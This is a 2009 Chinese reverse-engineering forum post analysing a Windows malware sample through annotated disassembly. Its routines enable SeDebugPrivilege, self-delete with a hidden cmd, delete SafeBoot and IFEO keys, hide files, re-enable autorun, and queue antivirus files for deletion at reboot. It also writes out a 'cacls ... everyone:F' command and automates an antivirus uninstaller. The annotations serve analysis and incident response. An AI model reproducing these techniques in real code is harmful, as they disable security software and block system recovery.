作 者: playboysen
时 间: 2009-02-06,08:11
链 接: http://bbs.pediy.com/showthread.php?t=81460
提权:
代码:
; AdjustPrivilege -- enable SeDebugPrivilege in the current process token.
;   Convention: 30h bytes of esp-relative locals, ebx preserved; no arguments.
;   eax on return is simply the result of the last AdjustTokenPrivileges call.
;   Analyst notes (review):
;   - DesiredAccess 20h is TOKEN_ADJUST_PRIVILEGES; the 2 OR'ed into ebx before
;     the second call is SE_PRIVILEGE_ENABLED (SDK constants).
;   - AdjustTokenPrivileges is called twice: first with Attributes = 0 and a
;     10h-byte PreviousState buffer, then with Attributes = 2, reusing the
;     PreviousState struct as NewState. The net effect is "enable", which can
;     only succeed if the token already holds SeDebugPrivilege (i.e. the
;     process runs as an administrator).
;   - The return values of OpenProcessToken, LookupPrivilegeValueA and
;     AdjustTokenPrivileges are never checked; AdjustTokenPrivileges returns
;     TRUE even on ERROR_NOT_ALL_ASSIGNED, so a failed elevation is silent.
;   - The token handle written to TokenHandle is never closed (no CloseHandle):
;     one leaked handle per call.
seg001:00406394 AdjustPrivilege proc near
seg001:00406394
seg001:00406394 push ebx
seg001:00406395 add esp, 0FFFFFFD0h ; reserve 30h bytes of locals (sub esp, 30h)
seg001:00406398 lea eax, [esp+30h+TokenHandle]
seg001:0040639C push eax ; TokenHandle (out)
seg001:0040639D push 20h ; DesiredAccess = TOKEN_ADJUST_PRIVILEGES
seg001:0040639F call GetCurrentProcess
seg001:0040639F
seg001:004063A4 push eax ; ProcessHandle (pseudo-handle of self)
seg001:004063A5 call OpenProcessToken ; result ignored
seg001:004063A5
seg001:004063AA lea eax, [esp+30h+Luid]
seg001:004063AE push eax ; lpLuid (out)
seg001:004063AF push offset Name ; "SeDebugPrivilege"
seg001:004063B4 push 0 ; lpSystemName = NULL (local machine)
seg001:004063B6 call LookupPrivilegeValueA ; result ignored; Luid is garbage on failure
seg001:004063B6
seg001:004063BB mov eax, [esp+30h+Luid.LowPart] ; copy LUID into NewState.Privileges[0]
seg001:004063BF mov [esp+30h+NewState.Privileges.Luid.LowPart], eax
seg001:004063C3 mov eax, [esp+30h+Luid.HighPart]
seg001:004063C7 mov [esp+30h+NewState.Privileges.Luid.HighPart], eax
seg001:004063CB mov [esp+30h+NewState.PrivilegeCount], 1
seg001:004063D3 xor ebx, ebx ; ebx = 0 -> Attributes = 0 for the first call
seg001:004063D5 mov [esp+30h+NewState.Privileges.Attributes], ebx
seg001:004063D9 push esp ; ReturnLength -> points at the lowest local (same slot IDA names BufferLength)
seg001:004063DA lea eax, [esp+34h+PreviousState]
seg001:004063DE push eax ; PreviousState (out, 10h bytes)
seg001:004063DF push 10h ; BufferLength = sizeof(TOKEN_PRIVILEGES) with one entry
seg001:004063E1 lea eax, [esp+3Ch+NewState]
seg001:004063E5 push eax ; NewState
seg001:004063E6 push 0 ; DisableAllPrivileges = FALSE
seg001:004063E8 mov eax, [esp+44h+TokenHandle]
seg001:004063EC push eax ; TokenHandle
seg001:004063ED call AdjustTokenPrivileges ; first call: Attributes = 0 (privilege disabled), fills PreviousState
seg001:004063ED
seg001:004063F2 mov eax, [esp+30h+Luid.LowPart] ; rebuild the same LUID in the PreviousState struct ...
seg001:004063F6 mov [esp+30h+PreviousState.Privileges.Luid.LowPart], eax
seg001:004063FA mov eax, [esp+30h+Luid.HighPart]
seg001:004063FE mov [esp+30h+PreviousState.Privileges.Luid.HighPart], eax
seg001:00406402 mov [esp+30h+PreviousState.PrivilegeCount], 1
seg001:0040640A or ebx, 2 ; ... with Attributes = SE_PRIVILEGE_ENABLED
seg001:0040640D mov [esp+30h+PreviousState.Privileges.Attributes], ebx
seg001:00406411 push esp ; ReturnLength (same stack slot again)
seg001:00406412 push 0 ; PreviousState = NULL (not wanted this time)
seg001:00406414 mov eax, [esp+38h+BufferLength] ; appears to be the ReturnLength written by the first call -- verify offsets
seg001:00406418 push eax ; BufferLength
seg001:00406419 lea eax, [esp+3Ch+PreviousState]
seg001:0040641D push eax ; NewState = the struct just filled (Attributes = 2)
seg001:0040641E push 0 ; DisableAllPrivileges = FALSE
seg001:00406420 mov eax, [esp+44h+TokenHandle]
seg001:00406424 push eax ; TokenHandle
seg001:00406425 call AdjustTokenPrivileges ; second call: enable SeDebugPrivilege; result not checked
seg001:00406425
seg001:0040642A add esp, 30h ; drop locals; TokenHandle is discarded without CloseHandle
seg001:0040642D pop ebx
seg001:0040642E retn
seg001:0040642E
seg001:0040642E AdjustPrivilege endp
代码:
; RegisterService -- Win9x-only process hiding via RegisterServiceProcess.
;   GetVersionExA fills an OSVERSIONINFOA (var_94 = 94h is the struct size
;   stored in dwOSVersionInfoSize); var_84 is var_94 + 10h, i.e. dwPlatformId,
;   and 2 is VER_PLATFORM_WIN32_NT. The RegisterServiceProcess path therefore
;   runs only when GetVersionExA succeeded AND the platform is not NT
;   (Windows 95/98/ME). RegisterServiceProcess(0, 1) (RSP_SIMPLE_SERVICE) on
;   those systems hides the calling process from the Ctrl+Alt+Del task list.
;   Review notes: the GetProcAddress result is stored in a global and called
;   through without a NULL check (a missing export would call address 0);
;   LoadLibrary/FreeLibrary on kernel32 only bumps a refcount since it is
;   always loaded. No arguments, no meaningful return value.
seg001:00406598 RegisterService proc near
seg001:00406598
seg001:00406598 add esp, 0FFFFFF6Ch ; reserve 94h bytes = sizeof(OSVERSIONINFOA)
seg001:0040659E mov [esp+94h+var_94], 94h ; dwOSVersionInfoSize
seg001:004065A5 push esp ; lpVersionInformation
seg001:004065A6 call GetVersionExA
seg001:004065A6
seg001:004065AB cmp eax, 1 ; eax = (ret != 0) ? 1 : 0  (cmp/sbb/inc idiom)
seg001:004065AE sbb eax, eax
seg001:004065B0 inc eax
seg001:004065B1 cmp al, 1
seg001:004065B3 jnz short loc_4065FE ; GetVersionExA failed -> do nothing
seg001:004065B3
seg001:004065B5 cmp [esp+94h+var_84], 2 ; dwPlatformId == VER_PLATFORM_WIN32_NT ?
seg001:004065BA jz short loc_4065FE ; NT/2000/XP: export does not exist, skip
seg001:004065BA
seg001:004065BC push offset s_Kernel32_dll ; "kernel32.dll"
seg001:004065C1 call LoadLibraryA
seg001:004065C1
seg001:004065C6 mov hModule, eax ; global
seg001:004065CB cmp hModule, 0
seg001:004065D2 jz short loc_4065FE
seg001:004065D2
seg001:004065D4 push offset s_Registerservi ; "RegisterServiceProcess"
seg001:004065D9 mov eax, hModule
seg001:004065DE push eax ; hModule
seg001:004065DF call GetProcAddress
seg001:004065DF
seg001:004065E4 mov addr_RegisterServiceProcess, eax ; not checked for NULL
seg001:004065E9 push 1 ; dwType = RSP_SIMPLE_SERVICE (register == hide)
seg001:004065EB push 0 ; dwProcessId = 0 -> current process
seg001:004065ED call addr_RegisterServiceProcess
seg001:004065F3 mov eax, hModule
seg001:004065F8 push eax ; hLibModule
seg001:004065F9 call FreeLibrary_0 ; IDA's "kernel32.dll" note here is a propagated comment, not an argument
seg001:004065F9
seg001:004065FE loc_4065FE:
seg001:004065FE add esp, 94h
seg001:00406604 retn
seg001:00406604
seg001:00406604 RegisterService endp
代码:
; del_self -- run a hidden "<COMSPEC> /c del "<own path>"" to remove the
;   executable from disk (self-deletion).
;   Layout (Delphi-style): the pushes at 00406A8F..00406A98 install an SEH
;   frame whose handler is sub_406B2B (try/finally); the cleanup at loc_406B1A
;   releases the three temporary strings via sub_403BEC (edx = 3).
;   The command line is assembled from four pieces by sub_403E0C (edx = 4):
;     [COMSPEC value] + " /c del \"" + [own module path] + [literal at
;     dword_406B5C -- IDA's "uCmdShow" tag on it is a mis-propagated comment;
;     presumably the closing quote, verify].
;   The 'push 0' at 00406AB1 appears to be WinExec's uCmdShow (0 = SW_HIDE),
;   pushed early, so the console window is never shown.
;   Review notes: COMSPEC is taken from the environment unchecked, so whatever
;   it points to is executed; GetEnvironmentVariableA/WinExec results are not
;   checked; 'del' can only succeed once this process has exited and its image
;   is unmapped -- presumably the caller terminates right after. The excerpt
;   stops at the normal-path retn; the SEH handler sub_406B2B is not shown.
seg001:00406A70 del_self proc near
seg001:00406A70
seg001:00406A70 push ebp
seg001:00406A71 mov ebp, esp
seg001:00406A73 add esp, 0FFFFFEECh ; 114h bytes of locals
seg001:00406A79 xor eax, eax
seg001:00406A7B mov [ebp+var_10C], eax ; three temp string refs zeroed for the finally block
seg001:00406A81 mov [ebp+var_110], eax
seg001:00406A87 mov [ebp+var_114], eax
seg001:00406A8D xor eax, eax
seg001:00406A8F push ebp ; --- SEH frame: handler = sub_406B2B
seg001:00406A90 push offset sub_406B2B
seg001:00406A95 push dword ptr fs:[eax] ; previous fs:[0]
seg001:00406A98 mov fs:[eax], esp
seg001:00406A9B push 104h ; nSize = MAX_PATH
seg001:00406AA0 lea eax, [ebp+Buffer]
seg001:00406AA6 push eax ; lpBuffer
seg001:00406AA7 push offset s_Comspec ; "Comspec"
seg001:00406AAC call GetEnvironmentVariableA ; read %COMSPEC% = path of the command interpreter (normally cmd.exe)
seg001:00406AAC
seg001:00406AB1 push 0 ; appears to be WinExec's uCmdShow (SW_HIDE), pushed ahead of the string building
seg001:00406AB3 lea eax, [ebp+var_110]
seg001:00406AB9 lea edx, [ebp+Buffer]
seg001:00406ABF mov ecx, 105h
seg001:00406AC4 call sub_403D34 ; var_110 = string from the COMSPEC buffer (helper body not shown)
seg001:00406AC4
seg001:00406AC9 push [ebp+var_110] ; piece 1: interpreter path
seg001:00406ACF push offset s_CDel ; piece 2: " /c del \""
seg001:00406AD4 lea edx, [ebp+var_114]
seg001:00406ADA xor eax, eax
seg001:00406ADC call sub_402708 ; eax = 0: resolves this module's own path (GetModuleFileNameA per original annotation; looks like ParamStr(0))
seg001:00406ADC
seg001:00406AE1 push [ebp+var_114] ; piece 3: own file path
seg001:00406AE7 push offset dword_406B5C ; piece 4 (IDA's "uCmdShow" label is wrong); presumably the closing '"'
seg001:00406AEC lea eax, [ebp+var_10C]
seg001:00406AF2 mov edx, 4 ; concatenate 4 pieces -> var_10C
seg001:00406AF7 call sub_403E0C
seg001:00406AF7
seg001:00406AFC mov eax, [ebp+var_10C]
seg001:00406B02 call sub_403F4C ; string -> C pointer (helper body not shown)
seg001:00406B02
seg001:00406B07 push eax ; lpCmdLine
seg001:00406B08 call WinExec ; i.e. "cmd.exe /c del "<own path>"", hidden window
seg001:00406B08
seg001:00406B0D xor eax, eax ; --- unwind SEH frame
seg001:00406B0F pop edx
seg001:00406B10 pop ecx
seg001:00406B11 pop ecx
seg001:00406B12 mov fs:[eax], edx
seg001:00406B15 push offset loc_406B32 ; return address for the finally block
seg001:00406B15
seg001:00406B1A loc_406B1A:
seg001:00406B1A lea eax, [ebp+var_114]
seg001:00406B20 mov edx, 3 ; release the 3 temp strings (var_114, var_110, var_10C)
seg001:00406B25 call sub_403BEC
seg001:00406B25
seg001:00406B2A retn
代码:
; Lock-protect two system files so they cannot be edited while the malware
; runs (original analyst annotations, translated):
;   - <system dir>\drivers\etc\hosts
;   - <prefix from sub_406DEC>\boot.ini   (prefix helper not shown; presumably
;     the boot drive root -- verify)
; For each file: build the path (sub_403D54 appends), FindFile_AdjustFileTime
; (per annotation: FindFirstFile + FileTimeToLocalFileTime +
; FileTimeToDosDateTime) returns al = 1 when the file exists, then
; sub_4066AC(path, edx = 10h) opens it with CreateFileA in exclusive/no-share
; mode (per annotation) so other programs get a sharing violation.
; The hosts path in [ebp-0ACh] was started before this excerpt and the code
; after loc_409201 is outside it.
; Review notes: the handle returned in eax by sub_4066AC is overwritten by the
; next lea and never closed, so the lock lasts for the process lifetime.
; A locked hosts file / boot.ini is a good live-response indicator
; (Process Explorer / handle.exe "find handle" on those paths).
seg001:00409138 mov edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts"
seg001:0040913D call sub_403D54 ; [ebp-0ACh] += "drivers\etc\hosts"
seg001:0040913D
seg001:00409142 mov eax, [ebp-0ACh]
seg001:00409148 call FindFile_AdjustFileTime ; look the file up; if found, fix up its timestamp (FindFirstFile/FileTimeToLocalFileTime/FileTimeToDosDateTime)
seg001:00409148
seg001:0040914D cmp al, 1
seg001:0040914F jnz short loc_409194 ; hosts not found -> skip locking
seg001:0040914F
seg001:00409151 lea eax, [ebp-0B4h]
seg001:00409157 call GetSystemDirectory ; rebuild the full path from scratch
seg001:00409157
seg001:0040915C lea eax, [ebp-0B4h]
seg001:00409162 mov edx, offset s_DriversEtcHos ; "drivers\\etc\\hosts"
seg001:00409167 call sub_403D54
seg001:00409167
seg001:0040916C mov eax, [ebp-0B4h]
seg001:00409172 call sub_403F4C ; string -> C pointer
seg001:00409172
seg001:00409177 mov edx, eax
seg001:00409179 lea eax, [ebp-0B0h]
seg001:0040917F call sub_403CF8 ; copy into [ebp-0B0h]
seg001:0040917F
seg001:00409184 mov eax, [ebp-0B0h]
seg001:0040918A mov edx, 10h ; open mode selector for sub_4066AC
seg001:0040918F call sub_4066AC ; CreateFileA, exclusive open: blocks modification of hosts; handle discarded
seg001:00409194
seg001:00409194 loc_409194: ; CODE XREF: seg001:0040914Fj
seg001:00409194 lea eax, [ebp-0B8h]
seg001:0040919A call sub_406DEC ; path prefix for boot.ini (not shown)
seg001:0040919A
seg001:0040919F lea eax, [ebp-0B8h]
seg001:004091A5 mov edx, offset s_Boot_ini ; "boot.ini"
seg001:004091AA call sub_403D54
seg001:004091AA
seg001:004091AF mov eax, [ebp-0B8h]
seg001:004091B5 call FindFile_AdjustFileTime ; same existence check + timestamp fix-up as above
seg001:004091B5
seg001:004091BA cmp al, 1
seg001:004091BC jnz short loc_409201 ; boot.ini not found -> skip locking
seg001:004091BC
seg001:004091BE lea eax, [ebp-0C0h]
seg001:004091C4 call sub_406DEC
seg001:004091C4
seg001:004091C9 lea eax, [ebp-0C0h]
seg001:004091CF mov edx, offset s_Boot_ini ; "boot.ini"
seg001:004091D4 call sub_403D54
seg001:004091D4
seg001:004091D9 mov eax, [ebp-0C0h]
seg001:004091DF call sub_403F4C
seg001:004091DF
seg001:004091E4 mov edx, eax
seg001:004091E6 lea eax, [ebp-0BCh]
seg001:004091EC call sub_403CF8
seg001:004091EC
seg001:004091F1 mov eax, [ebp-0BCh]
seg001:004091F7 mov edx, 10h
seg001:004091FC call sub_4066AC ; exclusive open of boot.ini: blocks modification; handle discarded
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
代码:
; Remove the SafeBoot entries for class {4D36E967-E325-11CE-BFC1-08002BE10318}
; (commonly documented as the DiskDrive device-setup class) under
; HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal and \Network.
; Without those keys Windows cannot boot into Safe Mode, which is the usual
; reason malware deletes them. The ControlSet001 copies listed in the post are
; not handled in this excerpt.
; Calling convention is register-based (Delphi style): eax = root key
; (80000002h = HKEY_LOCAL_MACHINE), edx = subkey path, ecx = key name.
; The callee at s_L_LxRulBSvw3I+0Ah is code that IDA mis-typed as a string; it
; is used as a "key exists" test (al == 1). RegDeleteKey here is a wrapper
; using the same register convention, not the raw stdcall API; its result is
; ignored. Note: IDA cannot hold two labels both named Del_Key -- the second
; one at 0040C726 is the loc_40C726 target of the jnz above it.
seg001:0040C6FF Del_Key:
seg001:0040C6FF mov ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}"
seg001:0040C704 mov edx, offset s_SystemCurre_5 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"... (Minimal)
seg001:0040C709 mov eax, 80000002h ; HKEY_LOCAL_MACHINE
seg001:0040C70E call near ptr s_L_LxRulBSvw3I+0Ah ; key-exists check (target mis-typed as string by IDA)
seg001:0040C70E
seg001:0040C713 cmp al, 1
seg001:0040C715 jnz short loc_40C726 ; absent -> try the Network entry
seg001:0040C715
seg001:0040C717 mov edx, offset s_SystemCurre_6 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"... (full key incl. GUID)
seg001:0040C71C mov eax, 80000002h
seg001:0040C721 call RegDeleteKey ; delete SafeBoot\Minimal\{GUID}; result ignored
seg001:0040C721
seg001:0040C726 Del_Key: ; (= loc_40C726)
seg001:0040C726 mov ecx, offset s_4d36e967-e325 ; "{4D36E967-E325-11CE-BFC1-08002BE10318}"
seg001:0040C72B mov edx, offset s_SystemCurre_7 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"... (Network)
seg001:0040C730 mov eax, 80000002h
seg001:0040C735 call near ptr s_L_LxRulBSvw3I+0Ah ; key-exists check
seg001:0040C735
seg001:0040C73A cmp al, 1
seg001:0040C73C jnz short loc_40C74D
seg001:0040C73C
seg001:0040C73E mov edx, offset s_SystemCurre_8 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"... (full key incl. GUID)
seg001:0040C743 mov eax, 80000002h
seg001:0040C748 call RegDeleteKey ; delete SafeBoot\Network\{GUID}; result ignored
HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
代码:
; Delete one Image File Execution Options (IFEO) subkey under HKLM.
; IFEO\<image>.exe "Debugger" entries are a common AV-kill / persistence trick,
; so this is either cleaning up a competitor's hijack or its own. The key name
; is built from three pieces by sub_403E0C (edx = 3): the IFEO prefix + the
; string at [off_41356C] + dword_40C884; which image name results is not
; visible in this excerpt. The same register-convention helpers as Del_Key
; are used (eax = HKLM, edx = subkey, ecx = name); ecx for the existence
; check at 0040C776 was loaded before this excerpt. Results are ignored.
seg001:0040C76C mov edx, offset s_SoftwareMic_7 ; Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
seg001:0040C771 mov eax, 80000002h ; HKEY_LOCAL_MACHINE
seg001:0040C776 call near ptr s_L_LxRulBSvw3I+0Ah ; key-exists check (ecx set earlier)
seg001:0040C776
seg001:0040C77B cmp al, 1
seg001:0040C77D jnz short loc_40C7AA ; absent -> nothing to delete
seg001:0040C77D
seg001:0040C77F push offset s_SoftwareMic_8 ; piece 1: IFEO prefix
seg001:0040C784 mov eax, off_41356C
seg001:0040C789 push dword ptr [eax] ; piece 2: image name string (contents not shown)
seg001:0040C78B push offset dword_40C884 ; piece 3
seg001:0040C790 lea eax, [ebp+var_80]
seg001:0040C793 mov edx, 3 ; concatenate 3 pieces -> var_80
seg001:0040C798 call sub_403E0C
seg001:0040C798
seg001:0040C79D mov edx, [ebp+var_80]
seg001:0040C7A0 mov eax, 80000002h
seg001:0040C7A5 call RegDeleteKey ; delete IFEO\<image>; result ignored
代码:
; Three policy writes via RegOpenKeyA / RegSetValueExA (dwType 4 = REG_DWORD,
; cbData 4), each through the key handle stored at [edi]:
;   1. HKLM\SYSTEM\ControlSet001\Control\StorageDevicePolicies\WriteProtect =
;      [ebp+Data] -- that value was stored before this excerpt (not visible).
;   2. HKCU (80000001h)\Software\...\Explorer\Advanced\ShowSuperHidden = 0
;      -> Explorer hides system+hidden ("super hidden") files, concealing
;         autorun.inf and dropped files from the user.
;   3. HKLM\SOFTWARE\...\policies\Explorer\NoDriveTypeAutoRun = 91h
;      -> per the documented bit layout (01h unknown, 04h removable,
;         08h fixed, 10h network, 20h CD-ROM, 80h reserved) this disables
;         autorun only for unknown and network drives and leaves it ON for
;         removable, fixed and CD-ROM media -- i.e. it undoes an autorun
;         hardening setting so the autorun.inf payload keeps working.
; Review notes: none of the RegOpenKeyA/RegSetValueExA results are checked;
; if an open fails, [edi] still holds the previous (already closed) handle and
; the following RegSetValueExA/RegCloseKey operate on it. For defenders these
; three values are cheap detection / IR indicators.
seg001:0040A080 push edi ; phkResult
seg001:0040A081 push offset s_SystemContr_1 ; SYSTEM\ControlSet001\Control\StorageDevicePolicies
seg001:0040A086 push 80000002h ; hKey = HKEY_LOCAL_MACHINE
seg001:0040A08B call RegOpenKeyA ; result ignored
seg001:0040A08B
seg001:0040A090 push 4 ; cbData
seg001:0040A092 lea eax, [ebp+Data] ; value set before this excerpt
seg001:0040A095 push eax ; lpData
seg001:0040A096 push 4 ; dwType = REG_DWORD
seg001:0040A098 push 0 ; Reserved
seg001:0040A09A push offset s_Writeprotect ; "WriteProtect"
seg001:0040A09F mov eax, [edi]
seg001:0040A0A1 push eax ; hKey
seg001:0040A0A2 call RegSetValueExA
seg001:0040A0A2
seg001:0040A0A7 mov eax, [edi]
seg001:0040A0A9 push eax ; hKey
seg001:0040A0AA call RegCloseKey_0
seg001:0040A0AA
seg001:0040A0AF xor eax, eax
seg001:0040A0B1 mov dword ptr [ebp+Data], eax ; Data = 0
seg001:0040A0B4 push edi ; phkResult
seg001:0040A0B5 push offset s_SoftwareMic_4 ; Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
seg001:0040A0BA push 80000001h ; hKey = HKEY_CURRENT_USER
seg001:0040A0BF call RegOpenKeyA
seg001:0040A0BF
seg001:0040A0C4 push 4 ; cbData
seg001:0040A0C6 lea eax, [ebp+Data]
seg001:0040A0C9 push eax ; lpData
seg001:0040A0CA push 4 ; dwType = REG_DWORD
seg001:0040A0CC push 0 ; Reserved
seg001:0040A0CE push offset s_Showsuperhidd ; "ShowSuperHidden"
seg001:0040A0D3 mov eax, [edi]
seg001:0040A0D5 push eax ; hKey
seg001:0040A0D6 call RegSetValueExA ; ShowSuperHidden = 0: hide system+hidden files
seg001:0040A0D6
seg001:0040A0DB mov eax, [edi]
seg001:0040A0DD push eax ; hKey
seg001:0040A0DE call RegCloseKey_0
seg001:0040A0DE
seg001:0040A0E3 mov dword ptr [ebp+Data], 91h ; autorun mask: off for unknown/network, on for removable/fixed/CD
seg001:0040A0EA push edi ; phkResult
seg001:0040A0EB push offset s_SoftwareMic_5 ; SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
seg001:0040A0F0 push 80000002h ; hKey = HKEY_LOCAL_MACHINE
seg001:0040A0F5 call RegOpenKeyA
seg001:0040A0F5
seg001:0040A0FA push 4 ; cbData
seg001:0040A0FC lea eax, [ebp+Data]
seg001:0040A0FF push eax ; lpData
seg001:0040A100 push 4 ; dwType = REG_DWORD
seg001:0040A102 push 0 ; Reserved
seg001:0040A104 push offset s_Nodrivetypeau ; "NoDriveTypeAutoRun"
seg001:0040A109 mov eax, [edi]
seg001:0040A10B push eax ; hKey
seg001:0040A10C call RegSetValueExA ; NoDriveTypeAutoRun = 91h
seg001:0040A10C
seg001:0040A111 mov eax, [edi]
seg001:0040A113 push eax ; hKey
seg001:0040A114 call RegCloseKey_0 ......
在Windows 2000/XP/Server 2003里面,软件厂商在碰到文件被占用无法马上替换或者删除问题的时候,都会使用MoveFileEx API函数(带MOVEFILE_DELAY_UNTIL_REBOOT标志)让系统在注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager下的PendingFileRenameOperations键值里建立一个延迟重命名/删除列表;系统在下次启动的时候,会话管理器(Session Manager,smss.exe)将在其它服务(包括杀毒软件的服务)启动之前,根据这个列表对文件进行延迟更新或者延迟删除操作。
PendingFileRenameOperations是一个REG_MULTI_SZ类型的注册表键值,不建议直接用注册表编辑器手工修改(容易破坏其多字符串格式,造成延迟删除列表损坏);查看其内容可以使用注册表编辑器或者专用注册表操作工具,修改则应通过MoveFileEx等API完成(该标志要求调用者具备管理员权限)。Windows XP在安装完需要重启的补丁以后就是利用PendingFileRenameOperations控制被占用文件进行升级和删除操作的。对应急响应人员而言,在重启之前检查这个键值里是否出现了杀毒软件组件(例如下面代码中的RavExt.dll、bsmain.exe)是一个简单直接的取证线索。
代码:
; Queue two Rising antivirus components for deletion at the next reboot.
; sub_408150 is first called with (eax = HKLM, edx = "...\Session Manager",
; ecx = "PendingFileRenameOperations") -- presumably reading or clearing the
; existing list; its body and the code in between are elided ("......").
; Then, for <system dir>\RavExt.dll and <system dir>\bsmain.exe:
;   MoveFileExA(lpExistingFileName, lpNewFileName = NULL, dwFlags = 4)
; 4 = MOVEFILE_DELAY_UNTIL_REBOOT; with a NULL new name this records a delete
; in PendingFileRenameOperations, which the session manager processes early
; in boot, before the AV service can protect its files. This flag requires
; administrator rights.
; Review notes: both MoveFileExA results are ignored; the hard-coded file
; names mean a relocated/renamed install is untouched. For IR the value
; itself is the artefact to collect before the box is rebooted.
seg001:00409CF3 mov ecx, offset s_Pendingfilere ; "PendingFileRenameOperations"
seg001:00409CF8 mov edx, offset s_SystemCurrent ; SYSTEM\CurrentControlSet\Control\Session Manager
seg001:00409CFD mov eax, 80000002h ; HKEY_LOCAL_MACHINE
seg001:00409D02 call sub_408150 ; registry helper on the pending-rename list (not shown)
seg001:00409D02
......
seg001:00409DF9 push 4 ; dwFlags = MOVEFILE_DELAY_UNTIL_REBOOT
seg001:00409DFB push 0 ; lpNewFileName = NULL -> delete on reboot
seg001:00409DFD lea eax, [ebp+var_28C]
seg001:00409E03 call GetSystemDirectory
seg001:00409E03
seg001:00409E08 lea eax, [ebp+var_28C]
seg001:00409E0E mov edx, offset s_Ravext_dll ; "RavExt.dll"
seg001:00409E13 call sub_403D54 ; append
seg001:00409E13
seg001:00409E18 mov eax, [ebp+var_28C]
seg001:00409E1E call sub_403F4C ; string -> C pointer
seg001:00409E1E
seg001:00409E23 push eax ; lpExistingFileName = <system dir>\RavExt.dll
seg001:00409E24 call MoveFileExA ; result ignored
seg001:00409E24
seg001:00409E29 push 4 ; dwFlags = MOVEFILE_DELAY_UNTIL_REBOOT
seg001:00409E2B push 0 ; lpNewFileName = NULL
seg001:00409E2D lea eax, [ebp+var_290]
seg001:00409E33 call GetSystemDirectory
seg001:00409E33
seg001:00409E38 lea eax, [ebp+var_290]
seg001:00409E3E mov edx, offset s_Bsmain_exe ; "bsmain.exe"
seg001:00409E43 call sub_403D54
seg001:00409E43
seg001:00409E48 mov eax, [ebp+var_290]
seg001:00409E4E call sub_403F4C
seg001:00409E4E
seg001:00409E53 push eax ; lpExistingFileName = <system dir>\bsmain.exe
seg001:00409E54 call MoveFileExA ; result ignored
使用命令行工具cacls.exe来提高everyone用户对文件autorun.inf的控制权限(仅对NTFS卷执行,见下面代码中对文件系统名"NTFS"的判断;FAT卷没有ACL)
CACLS filename [/T] [/E] [/C] [/G user:perm]
显示或者修改文件的访问控制表(ACL)
filename 显示 ACL。
/T 更改当前目录及其所有子目录中指定文件的 ACL。
/G user:perm 赋予指定用户访问权限。注意:若不同时指定 /E(编辑 ACL),/G 会用新的权限项替换整个 ACL,而不是在原 ACL 上追加;下面的样本正是这样把 autorun.inf 的 ACL 直接覆盖为 everyone:F。
Perm 可以是: R 读取
W 写入
C 更改(写入)
F 完全控制
代码:
; Grant Everyone full control on <drive>autorun.inf -- NTFS volumes only.
; GetVolumeInformation is queried for the drive in [ebp+var_4]; sub_403E98
; compares the returned file-system name in [ebp+var_27C] with "NTFS" and
; the jnz skips the block for other file systems (FAT has no ACLs).
; The pieces pushed here form the command
;   cmd /c echo Y| cacls <drive>autorun.inf /t /g everyone:F
; 'echo Y|' auto-answers cacls' "Are you sure (Y/N)?" prompt; '/g' without
; '/e' REPLACES the whole ACL rather than editing it, so a restrictive ACE a
; hardened system put on autorun.inf is wiped and the file becomes writable
; by anyone. The leading 'push 0' is presumably WinExec's uCmdShow
; (SW_HIDE) pushed early; the string concatenation and the WinExec itself
; come after this excerpt (loc_40D1B1 is the skip target).
seg001:0040D15D mov eax, [ebp+var_4] ; drive root to inspect
seg001:0040D160 call GetVolumeInformation
seg001:0040D160
seg001:0040D165 mov eax, [ebp+var_27C] ; file-system name returned above
seg001:0040D16B mov edx, offset s_Ntfs ; "NTFS"
seg001:0040D170 call sub_403E98 ; string compare, sets ZF
seg001:0040D170
seg001:0040D175 jnz short loc_40D1B1 ; not NTFS -> skip the cacls run
seg001:0040D175
seg001:0040D177 push 0 ; presumably uCmdShow = SW_HIDE for the later WinExec
seg001:0040D179 push offset s_CmdCEchoYCacl ; "cmd /c echo Y| cacls "
seg001:0040D17E push [ebp+var_4] ; drive root, e.g. "X:\"
seg001:0040D181 push offset s_Autorun_infTG ; "autorun.inf /t /g everyone:F"
seg001:0040D186 lea eax, [ebp+var_280] ; destination for the concatenated command line (rest of the block not shown)
代码:
; KillDuBa -- drives the Kingsoft AntiVirus (金山毒霸) 2008 uninstaller's
;   dialog by sending button clicks, then closes an Internet Explorer window.
;   Sequence:
;     FindWindowA("#32770", "<uninstaller title>")          -> dialog hwnd
;     FindWindowExA(dialog, NULL, "Button", "下一步(&N) >")  -> "Next" button
;     SendMessageA(btn, 0F5h = BM_CLICK, 0, 0) twice; Sleep(320h = 800 ms)
;     re-find dialog; find "卸载(&U)" ("Uninstall") button; BM_CLICK twice;
;     Sleep(0BB8h = 3000 ms)
;     FindWindowA("IEFrame", NULL) -> SendMessageA(hwnd, 112h = WM_SYSCOMMAND,
;       0F060h = SC_CLOSE, 1): closes the first IE window found (presumably
;       a post-uninstall survey page; not visible here)
;   Whatever starts the uninstaller is outside this proc (XREF from start).
;   Review notes: none of the window handles are checked for NULL;
;   SendMessageA(NULL, ...) just fails, so if the window title / button text
;   differs (another version or locale) the routine silently does nothing.
;   Sending BM_CLICK into an AV uninstaller's dialog from a foreign process
;   is itself a usable behavioural indicator. Clobbers eax, ecx, edx; ebx saved.
seg001:0040DAB4 KillDuBa proc near ; DATA XREF: start+1126o
seg001:0040DAB4 push ebx
